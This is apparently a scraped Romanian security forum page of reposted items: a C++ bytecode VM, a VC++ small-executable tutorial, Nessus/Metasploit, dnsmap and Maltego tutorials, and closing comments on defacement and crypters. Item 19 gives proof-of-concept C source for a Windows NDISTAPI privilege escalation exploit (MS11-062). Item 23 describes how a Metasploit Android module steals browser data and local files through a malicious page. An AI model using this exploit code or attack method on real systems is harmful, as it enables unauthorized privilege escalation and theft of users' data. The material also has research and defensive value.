) ) c->Reg[DestReg] |= c->Reg[SrcReg]; } void VORRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] |= imm32; } void VORRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] |= *(PDWORD)mem32; } const INST inst_table[23] = {{VRetn},{VJmp},{VPUSHImm},{VPUSHReg},{VPUSHMem},{VPOPReg},{VPOPMem},{VMovRegReg}, {VMovRegImm},{VMovRegMem},{VADDRegReg},{VADDRegImm},{VADDRegMem},{VSUBRegReg},{VSUBRegImm},{VSUBRegMem}, {VMulEaxReg},{VDivEaxReg},{VANDRegReg},{VAndRegImm},{VORRegReg},{VORRegImm},{VORRegMem}}; VMCONTEXT ExecuteVM(LPVOID Code, DWORD Size) { INST Ins; BYTE Op; LPVOID Stack; VMCONTEXT Context; for (Op = 0; Op < 7; Op++) Context.Reg[Op] = 0; Stack = GlobalAlloc(GMEM_FIXED, 1024 * 1024 * 2); if (Stack) { Context.Reg[REGISTER_ESP] = (DWORD)Stack; Context.EIP = (DWORD)Code; while (Context.EIP <= ((DWORD)Code + Size - 1)) { Op = *(PBYTE)Context.EIP; Ins = inst_table[Op]; Ins.FunctionCall(&Context); if (Op == 0) break; } GlobalFree(Stack); } return Context; } int main(void) { BYTE Code[13] = {0x08,0x00,0x05,0x00,0x00,0x00, // mov eax, 5 0x0B,0x00,0x05,0x00,0x00,0x00, // add eax, 5 0x00}; // retn VMCONTEXT Context = ExecuteVM(&Code, sizeof(Code)); std::cout << Context.Reg[REGISTER_EAX] << std::endl; return 0; } Sursa: ic0de.org
  18. Building small exe in VC++ 2010 li0n.coder hi all this is my first post at this amazing forum in this tutorial i will guide you step by step to make smallest possible native win32 application by using Visual C++ 2010 Express the reason for this tutorial is that VS 6.0 is very old but most people still use it because it makes small native exe also most projects were made by VS 6.0 so it is hard for some to convert it to the new edition of VS 1- download and install Visual C++ 2010 Express (free) 2- File>New>project 3- choose win32 project , let us name it smallexe, then press ok 4- new windows will pop up, click next 5- check empty project then click finish 6- go to project>add new item>c++ file> let us name it main , then press ok 7- paste this code which show simple message box #include <windows.h> int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBoxA(NULL,"my small exe!","info",0); return 0; } 8- now go to project>properties 9- press configuration manger and set active solution configuration to "release" then close 10- [optional step] many codes around will generate errors when you build it , simply because they were written in VS 6.0 and they don't support Unicode, if you don't know how to convert the project to Unicode we can disable this feature configuration properties>character set>change to "not set" 11- go to C/C++>optimization>optimization>choose minimize size 12- go to C/C++>code generation>run time library>choose multi threaded dll (/MT) why ? this option will Remove dependency of msvcr100.dll which is not available natively on windows xp 13-go to linker>manifest file>generate manifest>choose no 14-go to linker>debugging>generate debug info>choose no 15-go to linker>advanced>entry point> write WinMain 16- build the project yaaaay 2.5kb app, that run without any dependency !! when you write bigger project use minicrt.lib[download from attachments], it also will decrease the size linker>input>additional dependencies> write minicrt.lib; hope it works with you guys Sursa: ic0de.org
  19. Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062) #include "stdio.h" #include "windows.h" #define NTSTATUS int int main(int argc, char* argv[]) { PULONG pShellcode; char InputBuffer[4]={0}; ULONG AllocationSize,dwReturnSize; HANDLE dev_handle; SC_HANDLE hscmHandle = NULL; SC_HANDLE hscDriver = NULL; PROCESS_INFORMATION pi; STARTUPINFOA stStartup; printf("\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n"); dev_handle = CreateFile("\\\\.\\NDISTAPI" ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0); DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0x80000000,0,&dwReturnSize, NULL); return 1; } Via: http://www.softrce.net/archives/405 Sursa: http://www.ic0de.org/showthread.php?10860-SRC-Microsoft-Windows-NDISTAPI-Local-Privilege-Escalation-Vulnerability-%28MS11-062%29
  20. Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial Nessus the best vulnerability scanner, management and assessment tool and the metasploit the best database, software, program and tool for exploits. They both are the best in their domain but when we connect them to each other there is a extra smartness and purity occur in short we will make a best penetration testing tool for exploit an operating system by using Nessus with Metasploit. However there is a different way to do so and we have shared different methods and tutorials to integrate Metasploit with nessus or vice versa. In this article we will discuss the video tutorial in which I will show you the power of Nessus and metasploit. This tutorial is little from other tutorials that has been discussed before about Nessus, Metasploit, N map and Nexpose. Here is the list of some tutorials and than I will show you the difference between them to this tutorial. Metasploit Autopwn With Nessus Backtrack 5 Tutorial Integrate Nessus With Metasploit- Tutorial Nessus Setup On Backtrack 5 Metasploit Remote Desktop Exploit-Backtrack 5 Below is the tutorial in which I will show some advance feature of nessus like Filter feature to get the exploit available on the public and by using Metasploit I will show you how to exploit a computer or a vulnerability that has been found by nessus. Video: http://www.youtube.com/watch?feature=player_embedded&v=2zBqnHrUWDU#! Sursa: Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  21. Dnsmap - DNS Network Mapper Information is very important for performing penetration testing, on a vary first step ethical hackers/penetration tester try to get the maximum information about the target. The steps required for information gathering or footprinting has been discussed on earlier article click here to read. After all there are some automatic tools present to gather the information and these tools also help out to map the victim network by using their officials websites.In this article we will cover about DNSMAP. Dnsmap is a passive network mapper and normally known as subdomain brute forcer, it originally released on 2006, it used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. Dnsmap is a open source and tested on linux based operating system although it can be used on FreeBSD and windows plate form by using Cygwin, dnsmap was included in Backtrack 2, 3 and 4 Key Features IPv6 support Makefile included delay option (-d) added. This is useful in cases where dnsmap is killing your bandwidth ignore IPs option (-i) added. This allows ignoring user-supplied IPs from the results. Useful for domains which cause dnsmap to produce false positives changes made to make dnsmap compatible with OpenDNS disclosure of internal IP addresses (RFC 1918) are reported updated built-in wordlist included a standalone three-letter acronym (TLA) subdomains wordlist domains susceptible to “same site” scripting are reported completion time is now displayed to the user mechanism to attempt to bruteforce wildcard-enabled domains unique filename containing timestamp is now created when no specific output filename is supplied by user various minor bugs fixed DNSMAP Tutorial After downloading extract it now open terminal and go on the place where you have extract dnsmap and follow these steps: Type gcc dnsmap.c -o dnsmap or g++ dnsmap.c -o dnsmap make sure you have installed C compiler After this make it executable type chmod +x dnsmap And than run it by typing ./dnsmap domain.com $ dnsmap baidu.com dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org) [+] searching (sub)domains for baidu.com using built-in wordlist accounts.baidu.com IP address #1: 10.11.252.74 events.baidu.com IP address #1: 202.108.23.40 finance.baidu.com IP address #1: 60.28.250.196 Download: http://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz Sursa: http://www.ehacking.net/2011/02/dnsmap-dns-network-mapper.html
  22. Maltego- Information Gathering Tool Tutorial This article is link with our series article on footprinting (Information gathering) for previous story click here. Now beside whois,Nslookup and tracert command there are some tools that available on market to perform footprinting professionally, these tools provide a wide range of option and techniques to perform a valuable footprinting. In this article we will talk about Maltego, Maltego is an open source forensic application that are used to gather maximum information for the purpose of forensic and pen testing, it can represent a result in a very formal and easy to understand format. It is available in two flavours one is community edition and other is commercial version. You can download Maltego on your windows based operating system and for Linux based operating system. Click here to grab your copy. This is the top and main navigation bar, there are two tabs one is investigate and the other is manage tab. Now we are on the manage tab, where we can see different entities and transforms, but the point of consideration is Palette option turn it on. Palette option is the main option from you have to drag your main task, for example if you want to gather a information about a person than drag the person option and enter the name of the person to whom you are going to gather information. After all right click on a person and suppose we have to find the email addresses of a related person, than in the email option click all in the set and your scan will began. Output is depend on your computer processing speed and your internet speed. Now we have found a related email addresses. Is this enough? No there are more amazing options present on maltego like to your can gather information about DNS server. For this purpose see the video demonstration of maltego. Video: http://www.youtube.com/watch?v=QMypTK-dVaI&feature=player_embedded#! Sursa: Maltego- Information Gathering Tool Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  23. Android Data Stealing with Metasploit by creatures November 15, 2011 This vulnerability was found by Thomas Cannon back in 2010, I think. I just thought this is interesting to share to Android users . I tried this exploit on Marvell tablets with Android versions 1.6 – 2.2. The big one is using 1.6 and small is using 2.2. For some reason this tablet has been customize by a private company which is used for a project. Screenshot1: http://www.theprojectxblog.net/wp-content/uploads/2011/11/319-1024x768.jpg Firing up metasploit then using android_htmlfileprovider Screenshot2: http://www.theprojectxblog.net/wp-content/uploads/2011/11/305-1024x768.jpg Screenshot3: http://www.theprojectxblog.net/wp-content/uploads/2011/11/300-768x1024.jpg When the user accesses the malicious url that we have setup, consequences are the attacker will able to get any data including any sensitive data from/proc, browser files such as history,bookmarks and maybe even sessions. Also you can grab data from sdcards, As explained by Thomas Cannon in his blog: The Android browser doesn’t prompt the user when downloading a file, for example"payload.html", it automatically downloads to /sdcard/download/payload.html It is possible, using JavaScript, to get this payload to automatically open, causing the browser to render the local file. When opening an HTML file within this local context, the Android browser will run JavaScript without prompting the user. While in this local context, the JavaScript is able to read the contents of files (and other data). Screenshot4: http://www.theprojectxblog.net/wp-content/uploads/2011/11/293-1024x768.jpg Majority are now using Android Phones and Tablets especially here in PHL. Google should not be the only one who needs to fix this but also other companies producing or manufacturing Android Phones and Tablets with same version but most companies that I know just dont give a damn about fixing and updating, etc. PS: I also tried it on android 2.3 Archos and the exploit doesnt work Take care guys and be aware Sursa: http://www.theprojectxblog.net/android-data-stealing-with-metasploit/
  24. TU -> Server 1 -> ... -> Server n -> Victima Victima -> Server n -> ... -> Server 1 -> TU Asa cum datele ajung la tine, indiferent prin cate "filtre" trec, asa poate oricine sa ajunga la tine, ca si datele, pas cu pas... Cat despre moda asta cu "spartul" site-urilor mi se pare o prostie. Insa cea mai mare prostie e ca dupa ce te caci, il mai iei si la palme. Adica dupa ce ca faci ceva ce nu e permis de lege (acces neautorizat), te mai si lauzi la toata lumea ca tu "1337"-le ai fost.
  25. Sunt niste porcarii. Videoclipurile nu explica nimic, sunt "demonstrative" (nici asta nu stiu daca ar fi corect sa spun) iar acel articol parca e scris de un pusti care a folosit 2 cryptere si poate se crede zmeu. Una era sa explice cobein, Karcrack, steve (daca nu erau ei si inca cativa cu idei geniale nu existau acum atatea cryptere, desi ideile originale sunt ale lui Matt Pietrek cu multi, multi ani in urma) sau alte persoane care cel putin stiu care e structura unui executabil, alta e sa explice acel personaj care nu este altceva decat un utilizator casnic...
×
×
  • Create New...